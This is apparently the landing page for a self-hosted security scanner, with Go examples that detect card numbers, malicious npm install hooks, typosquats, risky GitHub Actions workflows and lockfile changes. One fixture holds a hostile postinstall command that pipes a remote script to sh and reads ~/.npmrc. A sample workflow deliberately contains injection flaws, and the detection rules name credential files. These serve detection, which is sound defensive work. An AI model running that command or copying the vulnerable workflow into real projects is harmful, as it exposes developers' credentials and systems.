Self-hosted security platform · v0.1.0

The security scanner that never sees your code

SAST, dependencies, secrets, containers, IaC, DAST, Kubernetes, PII and AI/ML — plus the deepest supply-chain attack detection anywhere. One self-hosted binary. No SaaS, no upload, no account.

$ curl -fsSL https://goju.app/install.sh | sh
(Coming soon)

  • macOS & Linux
  • SHA-256 + minisign verified
  • Single static binary
  • Your code stays on your machine
  • No SaaS, no telemetry
  • Signed releases
  • Air-gap capable

One platform, every layer

The scanners your whole stack needs

goju replaces a drawer full of tools with one binary — your application code, your dependencies, your containers, your infrastructure and your AI systems, all scanned locally.

SAST

Your own code — Semgrep, gosec and optional LLM review.

Dependencies (SCA)

Known CVEs via Trivy, Grype, OSV — reachability-aware with govulncheck.

Secrets

Committed credentials in the tree and across git history (Gitleaks).

Supply-chain attacks

Malicious install hooks, typosquats, poisoned packages — the depth below.

Container images

Base-image CVEs in Dockerfiles and compose files (Trivy).

Infrastructure (IaC)

Terraform / cloud-config misconfiguration and posture.

DAST

Running-app testing, including API & authenticated scans (ZAP, Nuclei).

Kubernetes (KSPM)

Cluster posture — privileged containers, host namespaces, root, hostPath.

License policy

OSS license allow/deny governance with configurable severity.

PII & cardholder data

Luhn-checked PANs, SSN, IBAN in code, fixtures and configs (PCI scope).
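What "Luhn-checked" buys you in practice: a bare 13-to-19-digit regex fires on timestamps, customer ids and placeholder zeros, so a PAN detector should keep only candidates that pass the mod-10 checksum and report them masked. The Go example below is added here to illustrate that and is not goju's code; the regex, the rule names, the masking format and the fixture are this example's own assumptions, and the two card numbers in it are the public network test numbers, not real accounts.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// panCandidate matches 13 to 19 digits, optionally grouped by single spaces or
// dashes, bounded by \b so a longer digit run (an id, a hash) is never partially matched.
var panCandidate = regexp.MustCompile(`\b(?:\d[ -]?){12,18}\d\b`)

// luhnValid implements the mod-10 checksum every card network uses: from the
// right, double every second digit, subtract 9 from doubles above 9, sum, and
// require the total to be divisible by 10.
func luhnValid(digits string) bool {
	sum := 0
	double := false
	for i := len(digits) - 1; i >= 0; i-- {
		d := int(digits[i] - '0')
		if d < 0 || d > 9 {
			return false
		}
		if double {
			d *= 2
			if d > 9 {
				d -= 9
			}
		}
		sum += d
		double = !double
	}
	return sum%10 == 0
}

// PANHit is one Luhn-valid card number, reported masked (first 6, last 4) so
// the finding itself does not widen PCI scope.
type PANHit struct {
	Line   int
	Masked string
}

func maskPAN(digits string) string {
	return digits[:6] + strings.Repeat("*", len(digits)-10) + digits[len(digits)-4:]
}

// findPANs scans text line by line and keeps only candidates that pass Luhn and
// are not a single repeated digit (0000... passes Luhn but is never a real PAN).
func findPANs(text string) []PANHit {
	var hits []PANHit
	stripSep := strings.NewReplacer(" ", "", "-", "")
	for n, line := range strings.Split(text, "\n") {
		for _, m := range panCandidate.FindAllString(line, -1) {
			digits := stripSep.Replace(m)
			if strings.Count(digits, digits[:1]) == len(digits) {
				continue
			}
			if !luhnValid(digits) {
				continue
			}
			hits = append(hits, PANHit{Line: n + 1, Masked: maskPAN(digits)})
		}
	}
	return hits
}

// sampleFixture is a constructed config fixture for this example; the card
// numbers are the public Visa/Mastercard test numbers.
const sampleFixture = "# constructed fixture\n" +
	"customer_id = 1234567890123\n" +
	"card = \"4111-1111-1111-1111\"\n" +
	"backup = 5500 0000 0000 0004\n" +
	"bogus = 4111111111111112\n" +
	"zeros = 0000000000000000\n"

func main() {
	for _, h := range findPANs(sampleFixture) {
		fmt.Printf("line %d: Luhn-valid PAN %s\n", h.Line, h.Masked)
	}
}
```

Of the six lines only two survive: the 13-digit customer id and the off-by-one "bogus" number fail the checksum, and the all-zero line is dropped by the repeated-digit rule even though it passes Luhn. Without that filtering a fixtures directory full of ids would be reported as cardholder data.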

AI / ML security

Malicious model artifacts, OWASP-LLM app flaws, model sourcing.

Compliance evidence

CRA, DORA, NIS2, SOC 2, GDPR, PCI — scored from your own scan data.

Where goju goes deepest

Supply-chain attacks vendor SaaS misses

CVE scanners tell you about yesterday's known vulnerabilities. goju also detects the actual compromise patterns — statically, before they reach a database.

Malicious install hooks

postinstall/preinstall scripts that exfiltrate credentials, fetch payloads or propagate worms — the Shai-Hulud / event-stream / ua-parser-js pattern, across 14 manifest formats.

behavior · BHV-*

Transitive worm propagation

Most scanners stop at your top-level manifest. goju walks node_modules, .venv and vendor/ and applies the same rules to every installed package — where the worm actually lives.

deep tree walk
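The two points above (install-hook inspection and walking every installed package, not just the top-level manifest) fit in one small scanner. The Go example below is added here to show the shape of such a check and is not goju's code: the rule ids, the indicator regexes and the in-memory fixture tree are this example's own assumptions, and it covers only npm's package.json lifecycle scripts (the .venv and vendor/ walks mentioned above would need their own manifest parsers).

```go
package main

import (
	"encoding/json"
	"fmt"
	"io/fs"
	"regexp"
	"testing/fstest"
)

// Lifecycle scripts npm runs automatically on install, i.e. where a malicious
// package gets code execution on the developer's machine or CI runner.
var installHooks = []string{"preinstall", "install", "postinstall", "prepare"}

// Constructed indicator rules for this example; a production rule set is larger
// and tuned against noise from legitimate native-build hooks.
var hookRules = []struct {
	ID string
	Re *regexp.Regexp
}{
	{"HOOK-NET-EXEC", regexp.MustCompile(`(curl|wget)[^|;&]*\|\s*(sh|bash|node)\b`)},
	{"HOOK-CRED-READ", regexp.MustCompile(`\.npmrc|\.aws/credentials|\.ssh/|process\.env`)},
	{"HOOK-OBFUSCATED", regexp.MustCompile(`base64|atob\(|eval\(`)},
}

type HookFinding struct{ Manifest, Package, Hook, RuleID string }

type npmManifest struct {
	Name    string            `json:"name"`
	Scripts map[string]string `json:"scripts"`
}

// scanManifest applies every rule to every install-time script of one package.json.
func scanManifest(path string, data []byte) ([]HookFinding, error) {
	var m npmManifest
	if err := json.Unmarshal(data, &m); err != nil {
		return nil, fmt.Errorf("%s: %w", path, err)
	}
	var out []HookFinding
	for _, hook := range installHooks {
		cmd, ok := m.Scripts[hook]
		if !ok {
			continue
		}
		for _, r := range hookRules {
			if r.Re.MatchString(cmd) {
				out = append(out, HookFinding{path, m.Name, hook, r.ID})
			}
		}
	}
	return out, nil
}

// scanTree walks the whole tree, nested node_modules included, so a hook in a
// transitive dependency gets the same rules as the top-level manifest.
// Pass os.DirFS(projectDir) to scan a real checkout.
func scanTree(fsys fs.FS) ([]HookFinding, error) {
	var all []HookFinding
	err := fs.WalkDir(fsys, ".", func(p string, d fs.DirEntry, err error) error {
		if err != nil || d.IsDir() || d.Name() != "package.json" {
			return err
		}
		data, err := fs.ReadFile(fsys, p)
		if err != nil {
			return err
		}
		found, err := scanManifest(p, data)
		all = append(all, found...)
		return err
	})
	return all, err
}

// fixture is a constructed in-memory project: a clean root manifest, a direct
// dependency with a harmless build hook, and a transitive dependency whose
// postinstall fetches a script and reads ~/.npmrc (example.invalid never resolves).
var fixture = fstest.MapFS{
	"package.json":                         {Data: []byte(`{"name":"my-app","scripts":{"build":"tsc","test":"jest"}}`)},
	"node_modules/helper-lib/package.json": {Data: []byte(`{"name":"helper-lib","scripts":{"postinstall":"node build.js"}}`)},
	"node_modules/helper-lib/node_modules/evil-dep/package.json": {Data: []byte(
		`{"name":"evil-dep","scripts":{"postinstall":"curl -s https://example.invalid/p.sh | sh; cat ~/.npmrc"}}`)},
}

func main() {
	findings, err := scanTree(fixture)
	if err != nil {
		panic(err)
	}
	for _, f := range findings {
		fmt.Printf("%s: %s hook in %s (%s)\n", f.RuleID, f.Hook, f.Package, f.Manifest)
	}
}
```

A scanner that stopped at the root package.json would report nothing here: the root and helper-lib are clean, and the two findings both come from the package two levels down. That is the reason for walking the installed tree rather than the declared one.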

Typosquats & homoglyphs

Damerau-Levenshtein edit-distance plus Cyrillic/Greek homoglyph detection across npm, PyPI, Go, Cargo and Composer. Catches lodahs, requets, Cyrillic-а-in-react.

typosquat · TSQ-*
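To make the edit-distance plus homoglyph idea concrete, here is an added Go example of the check described above. It is not goju's code: the homoglyph table is a constructed subset, the popular-package list is a stand-in for a real registry popularity feed, and the threshold of 2 edits and the 4-rune minimum are this example's own choices. Distance is the optimal-string-alignment variant of Damerau-Levenshtein, so an adjacent transposition (lodahs) costs one edit like a dropped letter (requets), and a Cyrillic look-alike (rеact) is caught at distance 0 after normalization.

```go
package main

import (
	"fmt"
	"strings"
)

// Constructed subset of Cyrillic and Greek letters that render like Latin ones,
// written as escapes so the look-alikes are visible in the source.
var homoglyphs = map[rune]rune{
	'\u0430': 'a', '\u0435': 'e', '\u043e': 'o', '\u0440': 'p', '\u0441': 'c', '\u0443': 'y', '\u0445': 'x', '\u0456': 'i', // Cyrillic
	'\u03b1': 'a', '\u03bf': 'o', '\u03c1': 'p', '\u03bd': 'v', '\u03b9': 'i', '\u03c4': 't', // Greek
}

// normalize lower-cases the name and folds homoglyphs to ASCII; it also reports
// whether any look-alike was present, which is a strong signal on its own.
func normalize(name string) (string, bool) {
	var b strings.Builder
	seen := false
	for _, r := range strings.ToLower(name) {
		if latin, ok := homoglyphs[r]; ok {
			r, seen = latin, true
		}
		b.WriteRune(r)
	}
	return b.String(), seen
}

func minInt(vals ...int) int {
	m := vals[0]
	for _, v := range vals[1:] {
		if v < m {
			m = v
		}
	}
	return m
}

// osaDistance is the optimal-string-alignment form of Damerau-Levenshtein:
// insertion, deletion, substitution and adjacent transposition each cost 1.
func osaDistance(a, b string) int {
	ra, rb := []rune(a), []rune(b)
	d := make([][]int, len(ra)+1)
	for i := range d {
		d[i] = make([]int, len(rb)+1)
		d[i][0] = i
	}
	for j := range d[0] {
		d[0][j] = j
	}
	for i := 1; i <= len(ra); i++ {
		for j := 1; j <= len(rb); j++ {
			cost := 1
			if ra[i-1] == rb[j-1] {
				cost = 0
			}
			d[i][j] = minInt(d[i-1][j]+1, d[i][j-1]+1, d[i-1][j-1]+cost)
			if i > 1 && j > 1 && ra[i-1] == rb[j-2] && ra[i-2] == rb[j-1] {
				d[i][j] = minInt(d[i][j], d[i-2][j-2]+1) // transposition
			}
		}
	}
	return d[len(ra)][len(rb)]
}

type TyposquatFinding struct {
	Name, Target string
	Distance     int
	Homoglyph    bool
}

// checkTyposquat flags a dependency whose normalized name is within maxDist edits
// of a popular package without being that package. Names shorter than 4 runes are
// skipped unless a homoglyph is present, because short names collide by chance.
func checkTyposquat(name string, popular []string, maxDist int) *TyposquatFinding {
	norm, homo := normalize(name)
	if len([]rune(norm)) < 4 && !homo {
		return nil
	}
	var best *TyposquatFinding
	for _, p := range popular {
		if name == p {
			return nil // the genuine package itself
		}
		if d := osaDistance(norm, p); d <= maxDist && (best == nil || d < best.Distance) {
			best = &TyposquatFinding{name, p, d, homo}
		}
	}
	return best
}

func main() {
	popular := []string{"lodash", "requests", "react", "express"} // constructed stand-in list
	for _, dep := range []string{"lodahs", "requets", "re\u0430ct", "react", "lodash-es"} {
		if f := checkTyposquat(dep, popular, 2); f != nil {
			fmt.Printf("TSQ %s looks like %s (distance %d, homoglyph %v)\n", f.Name, f.Target, f.Distance, f.Homoglyph)
		}
	}
}
```

Note the two negatives in the demo list: the genuine react is never flagged, and lodash-es sits three edits from lodash and passes. In a real scanner the threshold still needs an allow-list of legitimate near-neighbours, because popular names attract legitimate forks and scoped variants as well as squats.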

Known-malicious versions

An embedded, offline database of historical supply-chain incidents — refreshed from OSV's GHSA-MAL feed. Works fully air-gapped, no lookup call required.

malpkg · offline DB

CI/CD pipeline attacks

Unpinned GitHub Actions, pull_request_target with checkout (the tj-actions pattern), script injection and secret exposure on PR triggers.

pipeline · GHA-*
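The three workflow problems named above are all visible in the YAML text itself, so they can be found with a line scanner before any run. The Go example below is an added illustration, not goju's code: the rule ids, the line-based matching (a real scanner would parse the YAML) and the sample workflow are this example's assumptions, and the 40-hex value on the setup-node line is a constructed placeholder, not a real commit.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

var (
	usesLine  = regexp.MustCompile(`^\s*-?\s*uses:\s*([^\s#]+)`)
	fullSHA   = regexp.MustCompile(`^[0-9a-f]{40}$`)
	prTarget  = regexp.MustCompile(`\bpull_request_target\b`)
	prHeadRef = regexp.MustCompile(`github\.event\.pull_request\.head\.(sha|ref)`)
	// Contexts an external contributor controls; interpolating them with ${{ }}
	// into run: or an inline script turns the PR text into shell code.
	untrustedCtx = regexp.MustCompile(`\$\{\{[^}]*github\.(event\.(pull_request\.(title|body)|issue\.(title|body)|comment\.body)|head_ref)[^}]*\}\}`)
)

type PipelineFinding struct {
	Line   int
	RuleID string
	Detail string
}

// isUnpinned reports whether a uses: reference floats on a tag, branch or no
// ref at all instead of a full commit SHA. Local (./) and docker:// references
// are outside this check.
func isUnpinned(spec string) bool {
	if strings.HasPrefix(spec, "./") || strings.HasPrefix(spec, "docker://") {
		return false
	}
	at := strings.LastIndex(spec, "@")
	if at < 0 {
		return true // no ref: follows the default branch
	}
	return !fullSHA.MatchString(spec[at+1:])
}

// scanWorkflow returns findings in line order for one workflow file.
func scanWorkflow(text string) []PipelineFinding {
	var out []PipelineFinding
	targetTrigger := prTarget.MatchString(text)
	for n, line := range strings.Split(text, "\n") {
		ln := n + 1
		if m := usesLine.FindStringSubmatch(line); m != nil && isUnpinned(m[1]) {
			out = append(out, PipelineFinding{ln, "GHA-UNPINNED", m[1] + " is a mutable tag or branch, not a commit SHA"})
		}
		if targetTrigger && prHeadRef.MatchString(line) {
			out = append(out, PipelineFinding{ln, "GHA-PRTARGET-CHECKOUT", "pull_request_target runs with repo secrets but checks out the untrusted PR head"})
		}
		if untrustedCtx.MatchString(line) {
			out = append(out, PipelineFinding{ln, "GHA-SCRIPT-INJECT", "contributor-controlled context interpolated into a script"})
		}
	}
	return out
}

// sampleWorkflow is a constructed workflow exhibiting all three patterns.
const sampleWorkflow = `name: pr-check
on:
  pull_request_target:
    types: [opened, synchronize]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      - uses: actions/setup-node@0123456789abcdef0123456789abcdef01234567 # constructed placeholder SHA
      - run: echo "PR title: ${{ github.event.pull_request.title }}"
`

func main() {
	for _, f := range scanWorkflow(sampleWorkflow) {
		fmt.Printf("line %d %s: %s\n", f.Line, f.RuleID, f.Detail)
	}
}
```

Running it reports line 9 (checkout on a floating tag), line 11 (the PR head checked out under a pull_request_target trigger, which has write access and secrets) and line 13 (PR title interpolated into a shell command); the pinned setup-node step on line 12 is silent. The head-ref rule deliberately only fires when pull_request_target is present, since the same checkout under a plain pull_request trigger runs without secrets.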

New transitive deps

SBOM diff between scans catches the exact moment a malicious package silently joins your dependency tree — plus deps.dev reputation and provenance gaps.

sbomdiff · provenance
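A lockfile diff is the cheapest form of the SBOM diff described above: flatten each snapshot into name@version entries, record whether each one was declared or arrived transitively, and report what appeared. The Go example below is added here to show that and is not goju's code; it reads the npm package-lock v2/v3 "packages" map, the two snapshots are constructed, and the integrity check is this example's stand-in for the kind of gap the sample run on this page labels LCK-004.

```go
package main

import (
	"encoding/json"
	"fmt"
	"sort"
	"strings"
)

// lockfile is the subset of an npm package-lock (lockfileVersion 2 or 3) this
// example needs: the "" entry is the root project and lists direct deps; every
// other key is an installed path under node_modules.
type lockfile struct {
	Packages map[string]struct {
		Version      string            `json:"version"`
		Integrity    string            `json:"integrity"`
		Dependencies map[string]string `json:"dependencies"`
	} `json:"packages"`
}

type Dep struct {
	Name, Version string
	Transitive    bool // not a declared direct dependency, or installed nested
	HasIntegrity  bool // lockfile carries a content hash for the tarball
}

// depsFromLock flattens the packages map into "name@version" keys.
func depsFromLock(data []byte) (map[string]Dep, error) {
	var lf lockfile
	if err := json.Unmarshal(data, &lf); err != nil {
		return nil, err
	}
	direct := lf.Packages[""].Dependencies
	out := map[string]Dep{}
	for path, p := range lf.Packages {
		i := strings.LastIndex(path, "node_modules/")
		if i < 0 {
			continue // root entry or workspace link
		}
		name := path[i+len("node_modules/"):] // keeps @scope/name intact
		_, isDirect := direct[name]
		out[name+"@"+p.Version] = Dep{
			Name: name, Version: p.Version,
			Transitive:   !isDirect || strings.Count(path, "node_modules/") > 1,
			HasIntegrity: p.Integrity != "",
		}
	}
	return out, nil
}

type LockDiff struct {
	Added, Removed []Dep
}

// diffLocks reports what joined or left the tree between two snapshots; a
// version bump shows up as one Removed plus one Added entry.
func diffLocks(before, after map[string]Dep) LockDiff {
	var d LockDiff
	for k, dep := range after {
		if _, ok := before[k]; !ok {
			d.Added = append(d.Added, dep)
		}
	}
	for k, dep := range before {
		if _, ok := after[k]; !ok {
			d.Removed = append(d.Removed, dep)
		}
	}
	byName := func(s []Dep) { sort.Slice(s, func(i, j int) bool { return s[i].Name < s[j].Name }) }
	byName(d.Added)
	byName(d.Removed)
	return d
}

// Constructed lockfile snapshots: the second gained a nested dependency that
// nobody declared and that ships without an integrity hash.
const lockBefore = `{"lockfileVersion":3,"packages":{
 "":{"dependencies":{"left-pad":"^1.0.0"}},
 "node_modules/left-pad":{"version":"1.0.0","integrity":"sha512-constructed"}}}`

const lockAfter = `{"lockfileVersion":3,"packages":{
 "":{"dependencies":{"left-pad":"^1.0.0"}},
 "node_modules/left-pad":{"version":"1.0.0","integrity":"sha512-constructed"},
 "node_modules/left-pad/node_modules/evil-helper":{"version":"0.0.1"}}}`

// diffSnapshots diffs the two constructed snapshots.
func diffSnapshots() (LockDiff, error) {
	before, err := depsFromLock([]byte(lockBefore))
	if err != nil {
		return LockDiff{}, err
	}
	after, err := depsFromLock([]byte(lockAfter))
	if err != nil {
		return LockDiff{}, err
	}
	return diffLocks(before, after), nil
}

func main() {
	d, err := diffSnapshots()
	if err != nil {
		panic(err)
	}
	for _, dep := range d.Added {
		fmt.Printf("NEW %s@%s transitive=%v integrity=%v\n", dep.Name, dep.Version, dep.Transitive, !dep.HasIntegrity)
	}
}
```

The diff yields exactly one line: evil-helper@0.0.1 joined as a transitive dependency with no integrity hash, while the unchanged direct dependency is silent. Diffing on every scan is what makes the moment of arrival visible; a single scan of the "after" state would only show a tree that looks like every other tree.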

Built for what's next, and what's required

AI/ML security and regulatory evidence — in the box

AI/ML security

Most scanners use an LLM; goju also scans your AI systems. Real pickle-opcode disassembly over model artifacts, OWASP-LLM-Top-10 app flaws, and model-sourcing checks.

  • Malicious model artifacts — .pkl/.pt/.ckpt code-execution payloads
  • Prompt injection & insecure output handling (LLM01/LLM02)
  • Unpinned / typosquatted Hugging Face model references

Compliance, from real evidence

Scored framework reports built from your own scan data — not a questionnaire. Gaps, recommendations and reporting deadlines, with honest auto-coverage.

EU CRA · DORA · NIS2 · SOC 2 · GDPR · PCI-DSS

  • Reachability scoring cuts CVE noise to what's actually exploitable
  • Role cockpits — CEO, CTO, Dev-manager and Legal views

Runs entirely on your infrastructure

If you scan with a cloud vendor, you're uploading your dependency tree — and often your source — to a third party. goju is a single binary you run locally. Same job, in many cases deeper, without the upload.

  • No upload step. Source, lockfiles and findings never leave the box.
  • Air-gap capable. Embedded malicious-package and typosquat data; no internet required.
  • Signed, verifiable releases. Every build is minisign-signed and checked in-process.
  • Dashboard, CLI & CI gate. --fail-on-critical exits non-zero; SARIF/JSON out, plus auto-fix PRs.

goju supply-chain ./
# risk-ranked, no config needed
● event-stream@3.3.6 score 98
BHV-001 install hook exfiltrates env
MAL-003 known-malicious version
● reqeusts score 76
TSQ-002 typosquat of requests
● left-pad@1.0.0 score 41
LCK-004 no integrity hash

✓ 3 packages flagged · CWE + DORA tags
exit 2 (--fail-on-critical)

From zero to a CI gate in three commands

1. Install

One line, no dependencies. The built-in supply-chain scanners work with zero setup; external scanners are optional.

2. Scan

Point it at any project: goju supply-chain ./ — or goju scan --all for the full platform. No database, no account.

3. Gate & watch

Add --fail-on-critical in CI, or goju serve for the dashboard, scheduled scans and auto-scan on push.

goju 0.1.0 is launching soon

Single binary. Every layer of your stack. Your code never leaves your machine.
